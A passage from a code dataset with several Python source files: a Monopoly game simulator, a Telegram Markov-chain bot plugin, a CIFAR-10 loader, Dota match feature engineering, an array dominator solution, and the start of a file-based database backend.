self.board[new_position].visits += 1 # Increase hit counter.\n\n # Allows money to be exchanged between players or money pools.\n def exchange_money(self, giver, receiver, amount, summary):\n # Exchange the money.\n giver.money -= amount\n receiver.money += amount\n\n # If a player's money total went negative, allow them to make funds.\n for current_party in [receiver, giver]:\n if current_party.money <= 0 and isinstance(current_party, Player):\n current_party.make_funds(game_info=self)\n\n # Check if the player lost.\n if current_party.money <= 0:\n # Kick the player out.\n self.move_again = False # Stop the player's current turn.\n self.inactive_players.append(current_party) # Add the player to the inactive players list.\n self.active_players.remove(current_party) # Remove the player from the active players list.\n\n # Identify why the player lost.\n if summary[0] == \"Paying rent.\":\n property = summary[1]\n self.loss_reason = property.group\n else:\n self.loss_reason = summary\n\n # If there are still other players, give away the player's assets.\n if len(self.active_players) > 1:\n # Find the other party.\n parties = [receiver, giver]\n parties.remove(current_party)\n other_party = parties[0]\n\n # Determine who the player lost to.\n if other_party == self.bank:\n # The player lost to the bank (a MoneyPool, so adjust its money attribute).\n self.bank.money += current_party.money\n # TODO Auction off all properties.\n else:\n # The player lost to another player.\n other_party.money += current_party.money\n other_party.inventory.extend(current_party.inventory)\n # Transfer GOOJF cards.\n if current_party.chance_card:\n other_party.chance_card = True\n if current_party.community_chest_card:\n other_party.community_chest_card = True\n\n\n # Determines if the player owns all of the properties in the given property's group.\n def monopoly_status(self, player, current_property, additional_properties=()):\n # Find the name of the property's group.\n group = current_property.group\n\n # There are no monopolies for board spaces, railroads or utilities.\n if group in [\"none\", \"Railroad\", \"Utility\"]: # \"none\" is the default group for non-property spaces.\n return False # The property is not in a color group.\n\n # Count how many properties in the group that player owns.\n property_counter = 0 # Initialize counter.\n\n # Check all of the player's properties.\n for property in player.inventory:\n if property.group == group:\n property_counter += 1\n\n # Check additional properties.\n for property in additional_properties:\n if property.group == group:\n property_counter += 1\n\n # Return result.\n if property_counter == 3 and group in [\"Light Blue\", \"Pink\", \"Orange\", \"Red\", \"Yellow\", \"Green\"]:\n return True # The property is in a monopoly and a group of three.\n elif property_counter == 2 and group in [\"Dark Blue\", \"Brown\"]:\n return True # The property is in a monopoly and a group of two.\n else:\n return False # The player doesn't have a monopoly.\n\n # Sends a player to jail.\n def go_to_jail(self, player):\n player.position = 10 # Move player.\n self.board[10].visits += 1 # Increase hit counter.\n self.move_again = False # Prevent the player from moving again.\n player.in_jail = True # Set the player's Jail status to true.\n player.set_jail_strategy(self) # Allow the player to make strategy decisions.\n\n # Has a player buy a property.\n def buy_property(self, player, board_space, custom_price=False):\n # Allows a property to be bought at a custom price (used in auctions).\n if custom_price:\n self.exchange_money(amount=custom_price, giver=player, receiver=self.bank, 
summary=\"Buying property.\")\n pass # ##print(\"player\",player.number,\"bought\",board_space.name,\"(\",board_space.group,\") for\",custom_price)\n else:\n # Pay the money for the property.\n self.exchange_money(amount=board_space.price, giver=player, receiver=self.bank,\n summary=\"Paying property at auction.\")\n pass # ##print(\"player\",player.number,\"bought\",board_space.name,\"(\",board_space.group,\") for\",board_space.price)\n\n self.unowned_properties.remove(board_space) # Remove the property from the list of unowned properties.\n player.inventory.append(board_space) # Give the property to the player.\n\n # If the player has a completed a monopoly, add it to the player's list of monopolies.\n if self.monopoly_status(player, board_space):\n player.add_monopoly(board_space.group)\n pass # ##print(\"player\",player.number,\"MONOPOLIES\",player.monopolies)\n\n board_space.owned = True\n\n\n # Determine the owner of a property.\n def property_owner(self, property):\n\n # Find which player owns the property.\n for current_player in self.active_players:\n if property in current_player.inventory:\n return current_player\n\n # Return false is the property is unowned.\n return False\n\n # Determines the rent owed on a property.\n def calculate_rent(self, property, owner):\n # Rent for Railroads.\n if property.group == \"Railroad\":\n railroad_counter = 0\n for property in owner.inventory:\n if property.group == \"Railroad\":\n railroad_counter += 1\n rent = 25 * pow(2, railroad_counter - 1) # The rent.\n\n # Rent for Utilities.\n elif property.group == \"Utility\":\n utility_counter = 0\n for property in owner.inventory:\n if property.group == \"Utility\":\n utility_counter += 1\n if utility_counter == 2:\n rent = 70 # If the player owns both utilities, pay 10 times the dice.\n else:\n rent = 28 # If the player owns one utility, pay 4 times the dice.\n\n # Rent for color-group properties.\n else:\n if property.buildings == 5: # Check to see if there is a hotel.\n rent = property.rents[5] # Pay the 5th rent for a hotel.\n elif 0 < property.buildings < 5: # The property has houses.\n rent = property.rents[property.buildings]\n else:\n if property.group in owner.monopolies: # If the player has a monopoly...\n rent = property.rents[0] * 2 # Rent is doubled.\n else: # The player does not have a monopoly.\n rent = property.rents[0]\n\n return rent\n\n def calculate_rent_proportion(self, property, owner):\n # Rent for Railroads.\n if property.group == \"Railroad\":\n max_rent = 200\n rent = self.calculate_rent(property, owner) # 200\n # Rent for Utilities.\n elif property.group == \"Utility\":\n rent = 70\n max_rent = self.calculate_rent(property, owner) # 70\n\n # Rent for color-group properties.\n else:\n max_rent = property.rents[5]\n rent = self.calculate_rent(property, owner)\n\n return rent / max_rent\n\n\n # The player passed through pays rent to the player who owns the property the original player sits on..\n def pay_rent(self, player):\n # Find the property.\n current_property = self.board[player.position]\n\n # Find the owner of the property.\n owner = self.property_owner(current_property)\n\n # Exit if the owner is in jail and the \"no rent in jail\" house rule is in effect.\n if self.no_rent_in_jail and owner.in_jail:\n return\n\n # Rent for Railroads.\n if current_property.group == \"Railroad\":\n railroad_counter = 0\n for property in owner.inventory:\n if property.group == \"Railroad\":\n railroad_counter += 1\n rent = 25 * pow(2, railroad_counter - 1) # The rent.\n if 
player.card_rent: # Rent is double for the railroad cards.\n rent *= 2\n\n # Rent for Utilities.\n elif current_property.group == \"Utility\":\n # Roll the dice.\n die1 = self.get_roll()\n die2 = self.get_roll()\n self.dice_roll = die1 + die2\n\n # Check for snakes eyes.\n if self.snake_eyes_bonus and die1 == 1 == die2:\n self.exchange_money(amount=500, giver=self.bank, receiver=player, summary=\"Snake eyes bonus.\")\n\n utility_counter = 0\n for property in owner.inventory:\n if property.group == \"Utility\":\n utility_counter += 1\n if utility_counter == 2 or player.card_rent:\n rent = self.dice_roll * 10 # If the player owns both utilities, pay 10 times the dice.\n else:\n rent = self.dice_roll * 4 # If the player owns one utility, pay 4 times the dice.\n\n # Rent for color-group properties.\n else:\n if current_property.buildings == 5: # Check to see if there is a hotel.\n rent = current_property.rents[5] # Pay the 5th rent for a hotel.\n elif 0 < current_property.buildings < 5: # The property has houses.\n rent = current_property.rents[current_property.buildings]\n else:\n if current_property.group in owner.monopolies: # If the player has a monopoly...\n rent = current_property.rents[0] * 2 # Rent is doubled.\n else: # The player does not have a monopoly.\n rent = current_property.rents[0]\n\n # Pay the rent.\n summary = [\"Paying rent.\", current_property]\n\n self.exchange_money(amount=rent, giver=player, receiver=owner, summary=summary)\n\n\n # Handles auctions when a property is not bought.\n def auction(self, board_space):\n # Each player makes a bid on the property.\n for current_player in self.active_players:\n current_player.make_bid(game_info=self, property=board_space)\n\n # The two-player case.\n player1 = self.active_players[0]\n player2 = self.active_players[1]\n\n # The property is not bought.\n if player1.auction_bid < 1 and player2.auction_bid < 1:\n return # Exit function.\n\n # Player 1 buys it at $1\n elif player1.auction_bid > 0 and player2.auction_bid < 1:\n winning_bid = 1\n winning_player = player1\n\n # Player 2 buys it at $1\n elif player1.auction_bid < 1 and player2.auction_bid > 0:\n winning_bid = 1\n winning_player = player2\n\n # The bids tie. 
A random player buys the property.\n elif player1.auction_bid == player2.auction_bid:\n random_player = choice([player1, player2])\n winning_bid = random_player.auction_bid\n winning_player = random_player\n\n # Player 1 has a higher bid.\n elif player1.auction_bid > player2.auction_bid:\n winning_bid = player2.auction_bid + 1\n winning_player = player1\n\n # Player 2 has a higher bid.\n elif player2.auction_bid > player1.auction_bid:\n winning_bid = player1.auction_bid + 1\n winning_player = player2\n else:\n pass # ##print('error 8')\n return\n\n winning_player.make_auction_funds(winning_bid=winning_bid, property=board_space, game_info=self)\n self.buy_property(winning_player, board_space, custom_price=winning_bid)\n\n\n # Find the liquid wealth of all of the player's properties.\n def total_assets(self, player):\n liquid_property = 0 # The liquidated property wealth of the player.\n for board_space in player.inventory:\n liquid_property += board_space.price\n\n liquid_buildings = 0 # The cost of all buildings the player owns.\n for board_space in player.inventory:\n liquid_buildings += board_space.buildings * board_space.house_cost # Add the price of the buildings.\n\n all_assets = player.money + liquid_property + liquid_buildings\n return all_assets\n\n # Calculate the cost to un-mortgage a given property.\n def unmortgage_price(self, property):\n return int(round(Decimal(str(1.1 * (property.price / 2))), 0))\n\n # Decides what a player does on a property,\n def property_action(self, player, board_space):\n if board_space in player.inventory:\n return # The player owns the property. Nothing happens.\n elif board_space.mortgaged:\n return # The property is mortgaged. Nothing happens.\n elif board_space in self.unowned_properties: # The property is unowned.\n if self.trip_to_start and (not player.passed_go):\n return # The player has to wait to pass Go to buy/auction a property.\n else: # The player can buy it.\n if not player.unowned_property_action(game_info=self, property=board_space):\n # The player can't buy it or decides not to.\n if self.auctions_enabled: # If auctions are enabled...\n self.auction(board_space) # The property is auctioned.\n else: # The property is owned by another player.\n self.pay_rent(player) # The player pays the owner rent.\n\n # Decide what the player should do on a given board space.\n def board_action(self, player, board_space):\n if board_space.name == \"Just Visiting / In Jail\":\n pass # Nothing happens on Go or Just Visiting.\n\n elif board_space.name == \"Go\":\n # Give the player an extra $200 if the house rule is enabled.\n if self.double_on_go:\n self.exchange_money(amount=200, giver=self.bank, receiver=player,\n summary=\"Got extra $200 for landing on Go.\")\n\n elif board_space.name == \"Income Tax\":\n # The player pays $200. 
The '10% of all assets' option was removed in 2008.\n self.exchange_money(amount=200, giver=player, receiver=self.free_parking, summary=\"Income Tax.\")\n\n elif board_space.name == \"Free Parking\":\n if self.free_parking_pool: # Check to see if the Free Parking pool is enabled.\n # The player takes the money in Free Parking.\n self.exchange_money(amount=self.free_parking.money, giver=self.free_parking, receiver=player,\n summary=\"Received Free Parking pool.\")\n\n elif board_space.name == \"Chance\":\n self.chance(player) # Draw card and make action.\n\n elif board_space.name == \"Community Chest\":\n self.community_chest(player) # Draw card and make action.\n\n elif board_space.name == \"Go to Jail\":\n self.go_to_jail(player) # The player goes to jail.\n\n elif board_space.name == \"Luxury Tax\":\n # The player pays a $100 tax.\n self.exchange_money(amount=100, giver=player, receiver=self.free_parking, summary=\"Luxury Tax.\")\n\n else: # The player landed on a property.\n self.property_action(player, board_space)\n\n # Reset this variable.\n player.card_rent = False\n\n # An individual player takes a turn.\n def take_turn(self, player):\n self.turn_counter += 1 # Increase master turn counter\n self.doubles_counter = 0 # Reset doubles counter.\n\n # Track the player's money.\n # player.money_changes.append(player.money)\n\n # Is the player in jail?\n if player.in_jail: # Player is in jail.\n player.jail_counter += 1 # Increase the jail turn counter\n if player.jail_decision(self):\n player.jail_counter = 0 # Reset the jail counter.\n player.pay_out_of_jail(game_info=self) # Pay out using a card or $50.\n else:\n # Roll the dice.\n die1 = self.get_roll()\n die2 = self.get_roll()\n self.dice_roll = die1 + die2\n\n # Check for snake eyes.\n if self.snake_eyes_bonus and die1 == 1 == die2:\n self.exchange_money(amount=500, giver=self.bank, receiver=player, summary=\"Snake eyes bonus.\")\n\n # Make an action.\n if die1 == die2: # The player rolled doubles.\n player.jail_counter = 0 # Reset the jail counter.\n self.move_again = True # The player can move out of jail\n elif die1 != die2 and player.jail_counter == 3:\n player.jail_counter = 0 # Reset the jail counter.\n player.pay_out_of_jail(game_info=self) # Pay out using a card or $50.\n else: # The player didn't roll doubles.\n return # The player can not move around the board.\n\n if player.money > 0: # If the player did not go broke coming out of jail!\n self.move_again = True # Initial condition.\n\n # The main loop.\n while self.move_again:\n self.move_again = False\n\n # Roll the dice.\n die1 = self.get_roll()\n die2 = self.get_roll()\n self.dice_roll = die1 + die2\n\n # Check for snakes eyes.\n if self.snake_eyes_bonus and die1 == 1 == die2:\n self.exchange_money(amount=500, giver=self.bank, receiver=player, summary=\"Snake eyes bonus.\")\n\n # Check for doubles.\n if player.in_jail:\n player.in_jail = False # The player is no longer in jail, but can not move again regardless.\n elif die1 == die2:\n self.doubles_counter += 1 # Increase the doubles counter.\n if self.doubles_counter == 3: # The players is speeding.\n self.go_to_jail(player)\n return # The function ends.\n self.move_again = True # The player can move again.\n\n self.move_ahead(player, self.dice_roll) # Move the player\n board_space = self.board[player.position] # Find the current board space.\n self.board_action(player, board_space) # Make an action based on the current board space.\n\n # If a card or board space brought the player to jail, end the function.\n if 
player.in_jail:\n return\n\n\n # Play out one full game and report the results.\n def play(self):\n # Shuffle the players.\n shuffle(self.active_players)\n\n # Initial condition.\n current_player_index = 0\n\n # Store starting player for reference.\n self.starting_player = self.active_players[0].number\n\n # Game loop. Continue if there is more than 1 player and we haven't reached the cutoff.\n while len(self.active_players) > 1 and self.turn_counter < self.cutoff:\n # Create a rotated list of players for development, beginning one seat before the current player.\n self.development_order = []\n self.development_order.extend(self.active_players[current_player_index - 1:])\n self.development_order.extend(self.active_players[:current_player_index - 1])\n\n # Allow the players to develop and un-mortgage properties.\n for player in self.development_order:\n player.between_turns(game_info=self)\n\n # Current player takes turn.\n self.take_turn(self.active_players[current_player_index])\n\n # Update current_player_index.\n current_player_index = (current_player_index + 1) % len(self.active_players)\n\n # # # The game has ended # # #\n\n # Find all monopolies.\n all_monopolies = []\n for player in self.active_players:\n all_monopolies.extend(player.monopolies)\n for player in self.inactive_players:\n all_monopolies.extend(player.monopolies)\n\n # Identify the winner.\n if len(self.active_players) == 1:\n self.winner = self.active_players[0].number\n else: # It was a tie.\n self.winner = 0\n self.loss_reason = \"Tie\"\n\n # Ending report.\n results = {'winner': self.winner,\n 'length': self.turn_counter,\n 'end behavior': self.loss_reason,\n 'monopolies': all_monopolies,\n 'started': self.starting_player,\n 'players': self.active_players\n }\n return results\n","sub_path":"python_archive/monopoly_trading_archive.py","file_name":"monopoly_trading_archive.py","file_ext":"py","file_size_in_byte":88614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"213212732","text":"# Markov plugin\n# Commands:\n# - /markov\n# Monitors:\n# - markov_monitor\n# Configuration:\n# command.markov:\n# folder: \"markov data folder\"\n\nimport os\nimport json\nimport markovify\nfrom .basic import CommandBase, CommandInfo, CommandType, bot_command\n\nclass Markov(CommandBase):\n name = \"Markov\"\n safename = \"markov\"\n datfolder = \"\"\n users = dict()\n def __init__(self, logger):\n super().__init__(logger)\n self.to_register = [\n CommandInfo(\"markov\", self.execute_generate, \"Emulate yourself talking.\"),\n CommandInfo(\"markov_monitor\", self.monitor_modeling, \"Model users.\", _type=CommandType.Monitor)\n ]\n def get_help_msg(self, cmd):\n return \"Call /markov to have the Markov model generate text that sounds like you.\"\n def load_config(self, confdict):\n self.datfolder = confdict['folder']\n if os.path.exists(self.datfolder):\n for file in os.listdir(self.datfolder):\n with open(os.path.join(self.datfolder, file), 'r', newline='\\n') as f:\n udata = f.read()\n user = file.split('.json')[0]\n ujson = json.loads(udata)\n data = markovify.Text.from_dict(ujson)\n self.users[user] = data\n def on_exit(self):\n self.logger.info(\" Saving collected Markov data..\")\n if not os.path.exists(self.datfolder):\n os.makedirs(self.datfolder)\n for user in self.users:\n udata = self.users[user].to_json()\n with open(os.path.join(self.datfolder, '{}.json'.format(user)), 'w', newline='\\n') as f:\n f.write(udata)\n self.logger.info(\" Done saving.\")\n 
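# Note: both the /markov command below and the chat monitor use the single\n # shared key 'markov_model', so one model accumulates the whole chat's\n # messages and /markov imitates the chat as a whole rather than the\n # calling user, despite the 'Emulate yourself talking.' help text.\n 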
@bot_command\n def execute_generate(self, bot, update, args):\n user = 'markov_model'\n if user in self.users:\n out = None\n while out is None: # make_sentence() can return None; retry until it produces a sentence\n out = self.users[user].make_sentence()\n bot.send_message(chat_id = update.message.chat_id,\n text = out,\n disable_notification = True)\n else:\n bot.send_message(chat_id = update.message.chat_id,\n text = \"I currently have no data from you, try later.\",\n disable_notification = True)\n def monitor_modeling(self, bot, update):\n try:\n user = 'markov_model'\n intext = update.message.text\n if intext[-1] not in '.!?':\n intext += '.'\n new = markovify.Text(intext, state_size = 3)\n self.logger.info(\" Adding to a Markov model..\")\n if user not in self.users:\n self.users[user] = new\n else:\n self.users[user] = markovify.combine(models=[self.users[user], new])\n self.logger.info(\" Adding done.\")\n self.logger.info(\"markov_monitor processing completed successfully.\")\n except Exception as e:\n self.logger.error(e)\n","sub_path":"commands/markov.py","file_name":"markov.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"595104923","text":"import numpy as np\n# Width and height of each image.\nimg_size = 32\n\n# Number of channels in each image, 3 channels: Red, Green, Blue.\nnum_channels = 3\n\n# Length of an image when flattened to a 1-dim array.\nimg_size_flat = img_size * img_size * num_channels\n\n# Number of classes.\nnum_classes = 10\n\ndef _convert_images(raw):\n \"\"\"\n Convert images from the CIFAR-10 format and\n return a 4-dim array with shape: [image_number, height, width, channel].\n (Scaling the pixels to floats in [0.0, 1.0] is currently disabled below.)\n \"\"\"\n\n # Convert the raw images from the data-files to floating-points.\n # raw_float = np.array(raw, dtype=float) / 255.0\n raw_float = raw\n # Reshape the array to 4-dimensions.\n images_raw = raw_float.reshape([-1, num_channels, img_size, img_size])\n\n # Reorder the indices of the array.\n images = images_raw.transpose([0, 2, 3, 1])\n\n return images, images_raw","sub_path":"load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"537227652","text":"import numpy as np\nimport pandas as pd\nimport sklearn\nimport sklearn.preprocessing\nimport sklearn.cross_validation # KFold used in add_hero_synergy lives here in older scikit-learn (module removed in 0.20)\n\n\ndef drop_features(data):\n columns = [\"r1_hero\", \"r2_hero\", \"r3_hero\", \"r4_hero\", \"r5_hero\",\n \"d1_hero\", \"d2_hero\", \"d3_hero\", \"d4_hero\", \"d5_hero\",\n \"lobby_type\",\n \"radiant_24_count\", \"radiant_30_count\",\n \"radiant_32_count\", \"radiant_33_count\", \"radiant_35_count\", \"radiant_37_count\",\n \"dire_24_count\", \"dire_30_count\",\n \"dire_32_count\", \"dire_33_count\", \"dire_35_count\", \"dire_37_count\",\n \"bans\",\n ]\n data.drop(columns, axis=1, inplace=True)\n return data\n\n\ndef add_diff_teams(data):\n for feature_name in [\"level\", \"xp\", \"gold\", \"lh\", \"kills\", \"deaths\", \"items\"]:\n for func in [\"max\", \"min\", \"mean\", \"median\"]:\n data[\"diff_\" + feature_name + \"_\" + func] = data[\"r_\" + feature_name + \"_\" + func] - \\\n data[\"d_\" + feature_name + \"_\" + func]\n return data\n\n\n\ndef add_features(data):\n data = sort_players(data)\n\n data = add_missing_indicator(data)\n data = add_team_statistics(data)\n data = add_diff_teams(data)\n data = add_lobby_type(data)\n\n return data\n\n\ndef add_lobby_type(data):\n data[\"lobby_type_0\"] = data[\"lobby_type\"] == 0\n 
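# Boolean indicator per lobby type observed in the data (0, 1 and 7); the\n # raw categorical lobby_type column itself is dropped later in drop_features().\n 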
data[\"lobby_type_1\"] = data[\"lobby_type\"] == 1\n data[\"lobby_type_7\"] = data[\"lobby_type\"] == 7\n\n return data\n\n\ndef add_missing_indicator(data):\n columns = ['first_blood_time', 'first_blood_player2',\n 'radiant_bottle_time','radiant_courier_time', 'radiant_flying_courier_time',\n 'radiant_first_ward_time',\n 'dire_bottle_time', 'dire_courier_time', 'dire_flying_courier_time',\n 'dire_first_ward_time']\n\n for column in columns:\n data[\"isnan\" + column] = np.isnan(data[column])\n\n\n return data\n\n\ndef add_team_statistics(data):\n for team in [\"d\", \"r\"]:\n for feature_name in [\"level\", \"xp\", \"gold\", \"lh\", \"kills\", \"deaths\", \"items\"]:\n columns = []\n for player in [\"1\", \"2\", \"3\", \"4\", \"5\"]:\n columns += [team + player + \"_\" + feature_name]\n\n data[team+\"_\"+feature_name+\"_max\"] = np.max(data[columns], axis=1)\n data[team+\"_\"+feature_name+\"_min\"] = np.min(data[columns], axis=1)\n data[team+\"_\"+feature_name+\"_mean\"] = np.mean(data[columns], axis=1)\n data[team+\"_\"+feature_name+\"_mean^3\"] = np.mean(data[columns], axis=1) ** 3\n data[team+\"_\"+feature_name+\"_median\"] = np.median(data[columns], axis=1)\n\n return data\n\n\ndef sort_players(data):\n sort_feature = \"lh\"\n\n for team in [\"d\", \"r\"]:\n sort_by_columns = []\n for player in [\"1\", \"2\", \"3\", \"4\", \"5\"]:\n sort_by_columns += [team + player + \"_\" + sort_feature]\n vals = data[sort_by_columns].values\n sort_idx = list(np.ogrid[[slice(x) for x in vals.shape]])\n sort_idx[1] = vals.argsort(axis=1)\n\n for feature_name in [\"level\", \"xp\", \"gold\", \"lh\", \"kills\", \"deaths\", \"items\"]:\n columns = []\n for player in [\"1\", \"2\", \"3\", \"4\", \"5\"]:\n columns += [team + player + \"_\" + feature_name]\n\n data[columns] = data[columns].values[sort_idx]\n\n\n return data\n\n\n\n\ndef input_missing(train, test):\n\n imp = sklearn.preprocessing.Imputer()\n train = imp.fit_transform(train)\n test = imp.transform(test)\n\n return train, test\n\n\ndef scale_data(train, test):\n scaler = sklearn.preprocessing.StandardScaler()\n train = scaler.fit_transform(train)\n test = scaler.transform(test)\n\n return train, test\n\n\ndef shuffle_train(train, target):\n idx = np.arange(len(train))\n np.random.seed(1234)\n np.random.shuffle(idx)\n train = train.iloc[idx]\n target = target[idx]\n\n return train, target\n\n\ndef get_picks(data):\n N_heroes = 113\n X_pick = np.zeros((data.shape[0], N_heroes))\n\n for i, match_id in enumerate(data.index):\n for p in range(5):\n X_pick[i, data.ix[match_id, 'r%d_hero' % (p+1)]-1] = 1\n X_pick[i, data.ix[match_id, 'd%d_hero' % (p+1)]-1] = -1\n\n return X_pick\n\n\ndef add_hero_pairs(train, test, picks_train, picks_test, target):\n N_heroes = 113\n for i in range(N_heroes):\n for j in range(i+1, N_heroes):\n slide = target[np.logical_or(np.logical_and(picks_train[:, i] == 1, picks_train[:, j] == -1),\n np.logical_and(picks_train[:, i] == -1, picks_train[:, j] == 1))]\n if len(slide) > 3000:\n train_feature = np.logical_and(picks_train[:, i] == 1, picks_train[:, j] == -1).astype(np.float) - \\\n np.logical_and(picks_train[:, i] == -1, picks_train[:, j] == 1).astype(np.float)\n test_feature = np.logical_and(picks_test[:, i] == 1, picks_test[:, j] == -1).astype(np.float) - \\\n np.logical_and(picks_test[:, i] == -1, picks_test[:, j] == 1).astype(np.float)\n train[\"d_heroes_\"+str(i) + \"_\" + str(j)] = train_feature\n test[\"d_heroes_\"+str(i) + \"_\" + str(j)] = test_feature\n\n\n return train, test\n\n\ndef calc_rating(data, 
target):\n N = 113 # heroes\n\n # calculate each hero-pair synergy and antisynergy\n synergy = np.zeros((N,N)) # sum of wins in matches played together\n antisynergy = np.zeros((N,N)) # sum of wins when played against\n matchcounts = np.zeros((N,N)) # count of matches played together\n matchcounta = np.zeros((N,N)) # count of matches played against\n\n for match_counter, match_id in enumerate(data.index):\n # synergy when both heroes are in the winning team\n winteam = 'r' if target[match_counter] == 1 else 'd'\n looseteam = 'd' if winteam == 'r' else 'r'\n pind = [0] *5 # winner indices\n antipind = [0] *5 # loser indices\n # get indices of players in each team\n for i in range(5):\n pind[i] = data.ix[match_id, winteam+'%d_hero'%(i+1)]-1\n for i in range(5):\n antipind[i] = data.ix[match_id, looseteam+'%d_hero'%(i+1)]-1\n # accumulate synergy of pairs\n for i in range(5):\n for j in range(i+1,5):\n synergy[pind[i], pind[j]] +=1\n synergy[pind[j], pind[i]] +=1\n # accumulate match counter for playing together\n for i in range(5):\n for j in range(5):\n matchcounts[pind[i], pind[j]] +=1 # together and won\n matchcounts[antipind[i], antipind[j]] +=1 # together and lost\n\n # antisynergy when hero i is in the winning team while hero j is in the losing team\n for i in range(5):\n for j in range(5):\n antisynergy[pind[i], antipind[j]] +=1\n matchcounta[pind[i], antipind[j]] +=1\n matchcounta[antipind[j], pind[i]] +=1\n\n # normalize\n synergyrate = np.zeros((N,N))\n antisynergyrate = np.zeros((N,N))\n for i in range(N):\n for j in range(N):\n if matchcounts[i,j] !=0:\n synergyrate[i,j] = synergy[i,j]/matchcounts[i,j]\n else:\n synergyrate[i,j] = 0.5\n if matchcounta[i,j] !=0:\n antisynergyrate[i,j] = antisynergy[i,j]/ matchcounta[i,j]\n else:\n antisynergyrate[i,j] = 0.5\n\n return synergyrate, antisynergyrate\n\n\ndef add_hero_synergy_part(data, synergyrate, antisynergyrate):\n syn1 = np.zeros(len(data))\n syn2 = np.zeros(len(data))\n syn3 = np.zeros(len(data))\n antisyn1 = np.zeros(len(data))\n antisyn2 = np.zeros(len(data))\n antisyn3 = np.zeros(len(data))\n\n for player1 in range(1, 6):\n for player2 in range(player1+1, 6):\n syn1 += synergyrate[data[\"r\" + str(player1) + \"_hero\"]-1, data[\"r\" + str(player2) + \"_hero\"]-1]\n syn2 += synergyrate[data[\"d\" + str(player1) + \"_hero\"]-1, data[\"d\" + str(player2) + \"_hero\"]-1]\n syn3 = syn1 - syn2\n\n for player1 in range(1, 6):\n for player2 in range(1, 6):\n antisyn1 += antisynergyrate[data[\"r\" + str(player1) + \"_hero\"]-1, data[\"d\" + str(player2) + \"_hero\"]-1]\n antisyn2 += antisynergyrate[data[\"d\" + str(player1) + \"_hero\"]-1, data[\"r\" + str(player2) + \"_hero\"]-1]\n antisyn3 = antisyn1 - antisyn2\n\n return syn1, syn2, syn3, antisyn1, antisyn2, antisyn3\n\n\ndef add_hero_synergy(train, test, target):\n N = 10\n syn_antisyn_train = np.zeros((6, len(train)))\n syn_antisyn_test = np.zeros((6, len(test)))\n temp_syn_antisyn = np.empty_like(syn_antisyn_test)\n\n cv = sklearn.cross_validation.KFold(len(train), n_folds=N, shuffle=True, random_state=1234)\n for train_index, test_index in cv:\n synergyrate, antisynergyrate = calc_rating(train.iloc[train_index, :], target[train_index])\n syn_antisyn_train[0][test_index], syn_antisyn_train[1][test_index], syn_antisyn_train[2][test_index], \\\n syn_antisyn_train[3][test_index], syn_antisyn_train[4][test_index], syn_antisyn_train[5][test_index] = add_hero_synergy_part(train.iloc[test_index, :], synergyrate, antisynergyrate)\n temp_syn_antisyn = np.array(add_hero_synergy_part(test, synergyrate, antisynergyrate))\n 
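# Accumulate this fold's estimates for the fixed test set; dividing by N\n # below averages the synergy/antisynergy ratings over all folds.\n 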
syn_antisyn_test += temp_syn_antisyn/N\n\n train[\"synergy1\"] = syn_antisyn_train[0]\n train[\"synergy2\"] = syn_antisyn_train[1]\n train[\"synergy3\"] = syn_antisyn_train[2]\n train[\"antisynergy1\"] = syn_antisyn_train[3]\n train[\"antisynergy2\"] = syn_antisyn_train[4]\n train[\"antisynergy3\"] = syn_antisyn_train[5]\n\n test[\"synergy1\"] = syn_antisyn_test[0]\n test[\"synergy2\"] = syn_antisyn_test[1]\n test[\"synergy3\"] = syn_antisyn_test[2]\n test[\"antisynergy1\"] = syn_antisyn_test[3]\n test[\"antisynergy2\"] = syn_antisyn_test[4]\n test[\"antisynergy3\"] = syn_antisyn_test[5]\n\n return train, test\n\n\ndef preprocess_data(train, test, target):\n train, target = shuffle_train(train, target)\n\n train_picks, test_picks = get_picks(train), get_picks(test)\n train, test = add_hero_pairs(train, test, train_picks, test_picks, target)\n train, test = add_hero_synergy(train, test, target)\n\n train = add_features(train)\n test = add_features(test)\n\n train = drop_features(train)\n test = drop_features(test)\n\n train, test = input_missing(train, test)\n\n train = np.column_stack((train, train_picks))\n test = np.column_stack((test, test_picks))\n\n train, test = scale_data(train, test)\n\n return train, test, target","sub_path":"contests/CMC Spring 1/feature_extraction.py","file_name":"feature_extraction.py","file_ext":"py","file_size_in_byte":10460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"243805402","text":"def solution(A):\n N = len(A)\n \n # Remove two elements of array with different values until\n # all elements in array have same value\n size = 0\n for i in range(N):\n if size == 0:\n value = A[i]\n size = 1\n else:\n if value == A[i]:\n size += 1\n else:\n size -= 1\n\t\n\t# Check that the remaining value is indeed a dominator\n\t\n candidate = -1\n if size > 0:\n candidate = value\n\t\n count = 0\n for i in range(N):\n if A[i] == candidate:\n count += 1\n\t\n if count > N/2:\n i = 0\n while A[i] != candidate:\n i += 1\n return i\n else:\n return -1\n\n\n","sub_path":"Dominator.py","file_name":"Dominator.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"641274010","text":"from blitzdb.backends.file.queryset import QuerySet\nfrom blitzdb.backends.file.store import TransactionalCompressedStore,TransactionalStore,Store\nfrom blitzdb.backends.file.index import TransactionalIndex,Index\nfrom blitzdb.backends.base import Backend as BaseBackend,NotInTransaction,DatabaseIndexError\nfrom blitzdb.backends.file.serializers import PickleSerializer as Serializer\n\nimport os\nimport os.path\n\nimport hashlib\nimport datetime\nimport uuid\nimport copy\n\nfrom collections import defaultdict\n\nclass Backend(BaseBackend):\n\n \"\"\"\n The file backend that stores and retrieves DB objects in files.\n \"\"\"\n\n class Meta(object):\n supports_indexes = True\n supports_transactions = True\n\n #The default store & index classes that the backend uses\n CollectionStore = TransactionalStore\n Index = TransactionalIndex\n IndexStore = Store\n\n def __init__(self,path,autocommit = False,**kwargs):\n\n self._path = os.path.abspath(path)\n if not os.path.exists(path):\n os.makedirs(path)\n\n self.collections = {}\n self.stores = {}\n self.autocommit = autocommit\n self.indexes = defaultdict(lambda : {})\n self.index_stores = defaultdict(lambda : {})\n self.load_config()\n\n super(Backend,self).__init__(**kwargs)\n\n self.in_transaction = 
